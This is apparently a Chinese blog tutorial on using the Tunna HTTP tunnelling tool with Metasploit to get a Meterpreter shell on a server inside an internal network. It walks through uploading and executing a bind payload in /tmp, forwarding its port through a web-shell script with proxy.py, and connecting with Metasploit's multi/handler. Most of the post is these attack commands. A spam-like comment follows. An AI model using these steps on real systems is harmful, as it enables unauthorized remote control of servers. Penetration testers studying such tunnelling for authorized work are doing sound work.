Tunna & Msf反弹shell

在内网渗透的某些情况下,数据只进不出,但是目标Http数据必须得出来吧..

之前一篇文章提到用Tunna进行转发内网的数据(Tunna内网转发

提到过,它同样能结合Msf反弹meterpreter.Let's Start.

1.首先使用Msf生成一个payload绑定在12345端口

11.png


2.上传到网站目录&增加执行权限&执行

    ①.上传生成的payload到tmp目录

    ②.chmod +x /tmp/bind12345

    ③./tmp/bind12345

71.png

执行完毕后,会发现成功监听了12345端口,但此时还是在内网,接下来进行转发

3.转发

python proxy.py -u http://test.com/conn.php -l 12346 -r 12345 -v    #将目标刚才监听的12345端口转发至本地12346


4.msf

msf > use exploit/multi/handler

msf exploit(handler) > set LPORT 12346

msf exploit(handler) > set RHOST 127.0.0.1

msf exploit(handler) > exploit
...
啪啪啪,shell来了..








评论(1 Comments)

  1. 您的文章为我提供了游戏开发人员领域的最佳创意。

发表评论